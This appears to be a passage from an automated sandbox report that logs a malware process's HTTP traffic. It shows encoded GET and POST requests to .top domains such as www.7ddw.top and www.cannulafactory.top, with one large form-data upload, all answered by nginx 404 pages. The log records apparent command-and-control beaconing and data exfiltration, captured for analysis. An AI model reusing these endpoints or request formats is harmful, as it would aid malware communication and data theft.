                                                Data Ascii: vF/CEQwZkpRS7r+Hk6bR30oeGBxGwsbYF/lmc78TvisrPREwMmc6wBUodmtk8+tMk5o30Hf8D6h1cQZWImp0mmxL6qES/Z5gfAfmzN4Vie4Om1w0Jn4e6WId9Vu2cbnRmq4dd/zCqG+coZPbOqs1ZgknNe6Ik5udq2g1AXasSGLdp4eQlarHG8zfgGnKH4PPhTAJ0Tb5c+x/hAedUUQKsM1OyWTBu5Sehxw3yarZms9+eszroQV
                                                Aug 27, 2024 08:00:01.684344053 CEST2578OUTData Raw: 61 4d 4a 4a 65 51 4f 65 4f 54 44 47 75 32 55 34 31 36 7a 32 6d 35 78 58 42 61 6b 73 72 4c 39 4d 33 46 70 30 5a 5a 30 6f 58 67 71 79 75 36 76 58 2b 62 55 74 53 53 70 4c 41 64 64 63 6a 6c 62 69 4b 42 49 50 69 2f 61 32 47 59 4c 38 6b 69 30 6d 57 58
                                                Data Ascii: aMJJeQOeOTDGu2U416z2m5xXBaksrL9M3Fp0ZZ0oXgqyu6vX+bUtSSpLAddcjlbiKBIPi/a2GYL8ki0mWX5RIhWQRqVso5OgtenowXxjAXQgTUfjU2FLxN0FmyX+gkjnu63ZH45vUhTLCdY0/fAlHJYVk0VSxs25chTrjaPEEjUoDzmgdPJ5LjCoBvDr1QZGof7S24u1/bq0AfFKZemK/3HHgq2GplG2gmy0woquJXlEP/USKsV
                                                Aug 27, 2024 08:00:01.684438944 CEST3867OUTData Raw: 68 4e 51 39 46 72 47 33 4a 35 67 2b 2b 2f 66 48 37 49 36 61 53 70 2f 77 31 2b 65 31 51 79 74 46 6d 77 70 6d 57 57 73 66 6c 6d 31 43 4e 45 38 53 62 63 77 68 43 39 51 6f 69 49 4f 73 50 6a 79 45 66 39 48 6f 48 34 52 47 35 64 70 48 49 2f 31 53 4b 6a
                                                Data Ascii: hNQ9FrG3J5g++/fH7I6aSp/w1+e1QytFmwpmWWsflm1CNE8SbcwhC9QoiIOsPjyEf9HoH4RG5dpHI/1SKjVvVYTyxm8Kz4T8/XTzmfTgrmLMvOPzN4074gK5jvrred9iddnreEdSEvv6AreJ6Vx/Q2ABaHMLDoEvZzCkWLOYdtacKM1kcrYE7+BJmWH1ltlvkuUWyeFF6lbdbim1DT3tWn56C57kunhi+OS89ttO90w62vzl/ir
                                                Aug 27, 2024 08:00:01.684490919 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:00:01 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 08:00:01.684612036 CEST11601OUTData Raw: 56 50 32 4c 75 44 4d 78 41 41 59 43 5a 7a 32 65 52 76 70 79 39 37 6b 72 56 66 2f 7a 76 2b 37 73 63 54 37 32 72 32 31 56 31 54 66 62 37 32 43 78 36 4a 47 6c 72 32 45 45 34 61 43 74 52 6b 75 4a 6c 35 37 76 36 67 6d 72 5a 75 2f 76 6a 71 48 42 69 66
                                                Data Ascii: VP2LuDMxAAYCZz2eRvpy97krVf/zv+7scT72r21V1Tfb72Cx6JGlr2EE4aCtRkuJl57v6gmrZu/vjqHBif9c6rZDJFyDhGtwiI+E49TwKK2h228qcdJ+dY11eIJssp/aCSi4mVzRNnd12orsG0UfHGIltun5bNnotoHWzef0F7nvdXCbBWdVWXGNUTjJ6MXlDWKlFAZQaYYNjnGSqlGp7dtHPGZXWzAhC2h9/Z5K48lIhl0WFVX
                                                Aug 27, 2024 08:00:01.684644938 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:00:01.684659004 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:00:01.684948921 CEST5156OUTData Raw: 41 7a 4a 30 4b 75 39 6b 2b 72 54 33 52 31 62 42 57 6d 53 76 67 44 49 43 4c 39 49 71 59 44 6d 56 59 53 46 35 32 33 38 4e 48 38 66 71 33 55 78 73 54 62 55 6c 31 46 70 6c 77 58 51 4b 38 76 32 52 61 66 6d 4c 74 35 4a 43 6b 61 54 63 4a 68 44 4a 56 64
                                                Data Ascii: AzJ0Ku9k+rT3R1bBWmSvgDICL9IqYDmVYSF5238NH8fq3UxsTbUl1FplwXQK8v2RafmLt5JCkaTcJhDJVdMJX1Ke9mVK4f4ZZzFhgGJHlCjIwg22oKM2UIwx2jWDPVsY7C2lkZrclZqneXMSyGt3lJ1ZGlsUWb67OqOXJb2Mz02WpneR8z4O8IfsDBNxnokqwu0UwYMixW+l+e6WyKiPlBkzTNaSaFlcdDGo2ik4Sa7fDdEj7C3
                                                Aug 27, 2024 08:00:01.724869013 CEST2578OUTData Raw: 36 58 35 4e 53 32 4f 52 44 33 4b 2b 75 62 6e 30 56 72 39 32 57 37 32 6e 53 59 69 36 69 4b 61 41 7a 44 36 74 69 77 49 74 51 57 43 6d 31 46 32 35 79 56 4e 39 4e 79 62 63 6c 2f 4b 47 4e 68 63 32 78 4b 74 38 45 65 6f 39 54 6d 61 67 47 53 59 69 42 6f
                                                Data Ascii: 6X5NS2ORD3K+ubn0Vr92W72nSYi6iKaAzD6tiwItQWCm1F25yVN9Nybcl/KGNhc2xKt8Eeo9TmagGSYiBotsLZ4cErm8w18e/jZoaUXote2QlIUmSqe6B58RZthanJPCE4jLnXN1Oeb6P+NCHNr14VpU0qxhqsYdJ5sla2Y0JWl5jcHNF9B1pHTZxu/Pl1E8zMwssfjRX+5U1w2iAX0jD6kh2KYZnQG9eYE178Ldvfnt4RpKvhm
                                                Aug 27, 2024 08:00:01.947644949 CEST1289OUTData Raw: 6f 72 66 65 53 39 64 41 41 33 7a 35 63 39 38 75 62 51 47 79 7a 36 78 66 44 42 70 59 6a 52 6d 45 6a 56 72 64 63 45 68 66 39 34 73 5a 78 64 59 6b 6b 71 52 51 4d 32 51 6e 72 69 75 71 6c 4e 7a 51 44 50 6b 7a 71 6a 79 30 65 76 7a 46 37 5a 6e 35 31 73
                                                Data Ascii: orfeS9dAA3z5c98ubQGyz6xfDBpYjRmEjVrdcEhf94sZxdYkkqRQM2QnriuqlNzQDPkzqjy0evzF7Zn51sEuypFCdJ2XUzkMHAbI99IkeieeULG4Rpoi5YTJ2A/EFPSFk3dmE1SjFt0ZMiYKXHPxVNkhyS5kpTWaMhaKSRq7lyaZmuOJVERizTlmRzeDYzqDZUlbpkCMowkd0LOUlvoc1RyVBDwlBPhTm7gdQe9DgWFYPTaJKcS


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.11.204986918.183.3.45807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:04.218980074 CEST552OUTGET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:04.485450029 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:00:04 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 08:00:04.485575914 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:00:04.485625982 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:00:04.485639095 CEST277INData Raw: 3d 22 33 32 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 68 61 74 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.11.2049870154.23.184.207807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:09.928021908 CEST802OUTPOST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4c 73 54 74 53 38 42 30 4a 43 75 56 68 54 54 38 4c 79 75 42 4c 2b 4c 32 51 75 46 31 69 64 77 4d 68 31 57 57 54 70 7a 5a 49 59 64 68 77 41 46 67 66 43 34 76 73 63 6d 63 59 59 65 7a 78 6b 79 4f 6b 76 32 6a 6d 53 77 6d 41 6b 4a 37 2b 44 52 38 41 59 38 6c 2f 6f 65 49 2f 4e 56 62 35 34 69 50 43 37 79 6e 48 2f 78 41 47 48 49 56 46 74 61 6e 49 48 56 39 6e 46 50 4c 45 34 71 44 30 6a 42 65 7a 69 32 45 68 51 69 46 31 46 36 4f 6a 7a 38 42 30 74 37 50 46 50 7a 75 45 4d 43 4e 57 53 65 39 37 59 69 68 53 55 75 54 59 7a 7a 78 31 35 46 5a 37 67 5a 45 47 67 3d 3d
                                                Data Ascii: ij60MtY=FpNaodwtk1yjLsTtS8B0JCuVhTT8LyuBL+L2QuF1idwMh1WWTpzZIYdhwAFgfC4vscmcYYezxkyOkv2jmSwmAkJ7+DR8AY8l/oeI/NVb54iPC7ynH/xAGHIVFtanIHV9nFPLE4qD0jBezi2EhQiF1F6Ojz8B0t7PFPzuEMCNWSe97YihSUuTYzzx15FZ7gZEGg==
                                                Aug 27, 2024 08:00:10.236835957 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.11.2049871154.23.184.207807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:12.768650055 CEST1142OUTPOST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4e 4e 6a 74 56 66 35 30 46 79 75 53 6b 54 54 38 65 43 75 4e 4c 2b 48 32 51 76 78 6c 68 75 55 4d 69 51 36 57 55 74 6e 5a 42 49 64 68 6f 51 46 6c 41 79 34 6d 73 63 71 2b 59 61 61 7a 78 6c 53 4f 6b 63 2b 6a 69 53 77 70 55 30 4a 30 70 7a 52 2f 45 59 38 56 2f 6f 62 62 2f 4d 42 62 36 49 4f 50 4d 65 6d 6e 51 36 4e 48 43 6e 49 58 52 64 61 6b 52 58 56 2f 6e 46 44 44 45 34 54 34 7a 53 46 65 7a 43 57 45 7a 67 69 47 73 46 36 4a 37 7a 39 68 6b 76 61 2f 49 63 44 54 4d 38 75 72 55 33 4f 55 33 70 43 47 4c 6d 75 33 42 77 75 42 35 37 67 4c 79 69 34 66 56 76 57 34 77 62 73 4f 78 48 65 4a 41 6e 57 64 58 34 4f 33 71 4c 58 4a 2b 4f 36 6a 74 62 63 2b 62 71 6b 4a 41 67 4d 41 45 62 4c 61 6a 52 4b 48 63 2b 58 59 2b 54 57 49 39 53 31 68 39 61 70 66 7a 57 51 54 69 39 6f 48 79 34 72 77 64 2b 48 4e 63 50 6c 31 42 59 51 48 68 4f 74 47 7a 4f 67 73 46 66 30 6a 6b 46 7a 65 56 6c 2f 32 6b 50 31 70 7a 64 6a 41 7a 4d 58 43 46 4b 6e 37 64 4b 7a 71 50 6a 54 55 77 46 41 44 50 63 [TRUNCATED]
                                                Data Ascii: ij60MtY=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhuUMiQ6WUtnZBIdhoQFlAy4mscq+YaazxlSOkc+jiSwpU0J0pzR/EY8V/obb/MBb6IOPMemnQ6NHCnIXRdakRXV/nFDDE4T4zSFezCWEzgiGsF6J7z9hkva/IcDTM8urU3OU3pCGLmu3BwuB57gLyi4fVvW4wbsOxHeJAnWdX4O3qLXJ+O6jtbc+bqkJAgMAEbLajRKHc+XY+TWI9S1h9apfzWQTi9oHy4rwd+HNcPl1BYQHhOtGzOgsFf0jkFzeVl/2kP1pzdjAzMXCFKn7dKzqPjTUwFADPclK2hxCybaHodRUVRAcyLVcC5oV/JMunGco0HNo8BXttaQauxw8ss2Pohtyxv+q1sEdQyUtrLqxN6ElFQJa0SHOcN8mWucZdCEEbBIxtYipwHiGYiW/8JFW3DdYrQLuqxS1F4+JFylvDg379RN9zEYZAiGGTBasho54U1kauWV6i0c4HaXEWgCGmIzZ8m3WDfzQ218k3LVBY8A=
                                                Aug 27, 2024 08:00:13.070954084 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:00:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.11.2049872154.23.184.207807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:15.625886917 CEST1289OUTPOST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4e 4e 6a 74 56 66 35 30 46 79 75 53 6b 54 54 38 65 43 75 4e 4c 2b 48 32 51 76 78 6c 68 75 63 4d 69 6d 75 57 53 50 50 5a 54 59 64 68 32 41 46 6b 41 79 35 6b 73 63 69 36 59 61 48 4f 78 67 57 4f 6b 4f 47 6a 33 77 59 70 45 6b 4a 31 6e 54 52 39 41 59 38 42 2f 6f 66 31 2f 4d 56 68 35 34 4b 50 43 2b 57 6e 47 64 5a 41 4f 58 49 56 52 64 61 34 47 6e 56 33 6e 46 58 70 45 34 50 34 7a 51 42 65 79 30 53 45 67 68 69 47 30 46 36 4b 6f 54 39 75 2f 66 61 4b 49 63 58 74 4d 38 76 51 55 79 32 55 33 72 61 47 5a 6c 47 30 41 51 75 42 36 37 67 4d 32 69 30 62 56 76 4b 61 77 61 59 4f 78 42 2b 4a 43 48 57 64 46 4e 79 34 75 72 58 51 36 4f 36 4b 37 72 51 49 62 73 49 64 41 68 6f 41 48 72 76 61 69 69 79 48 65 66 58 59 2b 7a 57 4b 7a 79 30 72 7a 36 70 44 7a 57 42 34 69 39 49 74 79 37 48 77 48 62 7a 4e 4a 61 52 32 47 34 52 43 76 75 74 54 35 75 6b 6f 46 66 6b 4a 6b 46 7a 4f 56 6e 54 32 6b 2b 46 70 79 65 37 44 77 63 58 4a 63 36 6e 79 54 72 50 6b 50 6e 7a 63 77 46 34 70 50 64 [TRUNCATED]
                                                Data Ascii: ij60MtY=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhucMimuWSPPZTYdh2AFkAy5ksci6YaHOxgWOkOGj3wYpEkJ1nTR9AY8B/of1/MVh54KPC+WnGdZAOXIVRda4GnV3nFXpE4P4zQBey0SEghiG0F6KoT9u/faKIcXtM8vQUy2U3raGZlG0AQuB67gM2i0bVvKawaYOxB+JCHWdFNy4urXQ6O6K7rQIbsIdAhoAHrvaiiyHefXY+zWKzy0rz6pDzWB4i9Ity7HwHbzNJaR2G4RCvutT5ukoFfkJkFzOVnT2k+Fpye7DwcXJc6nyTrPkPnzcwF4pPdhK3BxCkoyIxdRTaxAC8rVtC5kz/IJZnWAo13do5RXir6QGkRw6nM2PohpIxviq1/YdCxMtuYCxAaEZFQIc0SLtcMoIWutRdAoEVx0xh5iq13iDciWOjZBF3DRQrUn+qiW1G7WJPSlsGA3G6RNv5kcVAiysTAu8hr54UURz8kd18mYzaePkXSHX/bj+7kbNdqfew0U3yaZfELYo6S4yLkQsEW9eo2BJTuyD6hMTqOnEexAnny+NJMDIYGkCGXMGdgXCx5mzsRb9IkLBkbiaXCYtzh8TLSGkBJkeu+PcSts3QfLkn7AEimmkCDuYoGqzGkYEbySYIjafoslU6EBQwg45ISDqYmLMr
                                                Aug 27, 2024 08:00:15.625936031 CEST1289OUTData Raw: 6d 6b 33 49 4e 79 4b 6b 33 37 47 61 73 4b 45 6e 2f 49 2b 32 4e 34 4c 41 2b 65 61 61 6e 62 4e 2f 66 59 53 2b 4f 76 77 58 32 6f 31 32 56 59 6c 43 41 38 66 51 6c 72 4a 47 2f 4d 58 7a 4c 65 36 48 36 38 6c 51 53 71 54 7a 57 31 30 46 65 50 56 70 58 70
                                                Data Ascii: mk3INyKk37GasKEn/I+2N4LA+eaanbN/fYS+OvwX2o12VYlCA8fQlrJG/MXzLe6H68lQSqTzW10FePVpXp10Kj+YkVYQo6QshVihpReZF8XCylVUig0yN/oDeM+Xwv6wC1gbXJPHwurY5rd1T/cviSbY3SE9ILjvGJdMLbIjEz5QcMEQvygdWraXaukCFfVvdI03pcUMTmEaoUdY0b+7A+1Ili08huPfR5/i+Ljk1SRAlSG8pB0
                                                Aug 27, 2024 08:00:15.625988007 CEST10312OUTData Raw: 57 30 6d 35 6c 73 64 47 62 46 6a 63 57 2f 45 4c 45 32 30 79 43 57 56 47 36 77 55 64 4f 63 50 58 51 70 34 41 39 77 37 76 43 42 73 2f 66 4d 68 39 58 53 53 32 75 50 37 67 65 61 6d 52 49 69 31 70 4a 64 32 58 53 31 54 58 48 72 49 36 35 48 76 53 43 63
                                                Data Ascii: W0m5lsdGbFjcW/ELE20yCWVG6wUdOcPXQp4A9w7vCBs/fMh9XSS2uP7geamRIi1pJd2XS1TXHrI65HvSCcCMjKEsNbO0wkizSSUcnUTaoAkz2Q9vnVNYY5DTfe96vUwGRq+DHO+wftMlEQPv/QDv9ZItM9Jk1uZNRXqqc1rGnOGCbwp+dmvD4hJqp+UEBMplOFaohqQhCUv5zdz7JaiMdZKR9h+5T8+ulOT/8ZjPQ3woeoORUw/
                                                Aug 27, 2024 08:00:15.956015110 CEST1289OUTData Raw: 73 75 41 41 72 71 35 30 52 56 49 4a 4b 6c 75 6e 6e 4f 35 73 48 66 74 5a 6a 41 55 6c 79 41 67 63 52 44 2f 4f 79 38 4d 7a 48 49 47 38 71 48 31 7a 63 59 30 35 64 39 70 51 70 56 4d 53 6d 75 66 44 62 4d 45 38 38 72 38 4a 64 6b 44 4c 4f 73 7a 57 32 6e
